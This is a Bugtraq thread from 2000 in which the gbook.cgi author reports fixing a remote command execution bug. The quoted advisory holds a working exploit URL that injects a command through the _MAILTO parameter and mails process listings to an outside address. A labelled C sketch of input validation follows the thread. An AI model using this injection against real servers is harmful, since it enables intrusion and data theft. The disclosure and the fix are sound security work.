[17607] in bugtraq


Re: [hacksware] gbook.cgi remote command execution vulnerability

daemon@ATHENA.MIT.EDU (William Kendrick)
Sun Nov 12 14:08:23 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <200011120300.eAC30wg30450@sonic.net>
Date:         Sat, 11 Nov 2000 19:00:58 -0800
Reply-To: William Kendrick <nbs@SONIC.NET>
From: William Kendrick <nbs@SONIC.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

So far as I can tell, it's fixed...  Please let me know if anyone
sees any other glaring holes.  It IS rather ancient software.

-bill!

Forwarded message:
> From mbrennen@fni.com  Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennen@fni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennen@fni.com>
> To: William Kendrick <nbs@sonic.net>
> Cc: mat@hacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
>  (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974@sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000@henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
>    -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly!  My @zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> >   ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now.  There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > >    -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <mat@IVNTECH.COM>
> > > To: BUGTRAQ@SECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > >    Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > >   GBook - A web site guestbook
> > >      By Bill Kendrick
> > >      kendrick@zippy.sonoma.edu
> > >      http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mat@hacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > >  gbook.cgi is used by some web sites.
> > >  We can set _MAILTO parameter, and popen is called to execute mail command.
> > >  If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > >  It's so trivial. :)
> > > 7. Exploits
> > >  This exploit executes "ps -ax" command and sends the result to haha@yaho.com.
> > >
> > >  wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha@yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe@yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > |               mat@hacksware.com               |
> > > |             http://hacksware.com              |
> > > =================================================
> > >
> > >
> >
>
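
Added example (not part of the original thread and not the actual gbook fix): one way a C CGI can handle the two issues raised above, the unvalidated _MAILTO value reaching popen() and the unbounded sprintf(). The function names, the 254-byte limit and the exact `mail` command string are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_RCPT 254  /* assumed upper bound on address length */

/* Allowlist check for a recipient taken from a CGI parameter such as _MAILTO.
 * Returns 1 only if every byte is in a small safe set (default "C" locale),
 * so shell metacharacters, spaces and newlines never reach popen(). */
int rcpt_is_safe(const char *s)
{
    size_t n, i, at = 0;

    if (s == NULL) return 0;
    n = strlen(s);
    if (n == 0 || n > MAX_RCPT) return 0;
    if (s[0] == '-') return 0;        /* would be read as an option by mail */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '@') { at++; continue; }
        if (!isalnum(c) && c != '.' && c != '_' && c != '-' && c != '+')
            return 0;
    }
    return at == 1 && s[0] != '@' && s[n - 1] != '@';
}

/* Build the mail command with a bounded write. Returns 0 on success,
 * -1 if the recipient is rejected or the result would not fit. */
int build_mail_cmd(char *out, size_t outlen, const char *rcpt)
{
    int w;

    if (!rcpt_is_safe(rcpt)) return -1;
    w = snprintf(out, outlen, "mail -s 'Guestbook entry' %s", rcpt);
    if (w < 0 || (size_t)w >= outlen) return -1;   /* truncated: refuse */
    return 0;
}

int main(void)
{
    /* Constructed sample inputs, not taken from any real request. */
    const char *samples[] = { "owner@example.org", "a;b", "-f@example.org" };
    char cmd[128];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %s\n", samples[i],
               build_mail_cmd(cmd, sizeof cmd, samples[i]) == 0 ? cmd : "rejected");
    return 0;
}
```

Because popen() hands its argument to /bin/sh, the allowlist is the only barrier here; running the mailer with fork() and execv() and an argument vector removes the shell from the path altogether.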
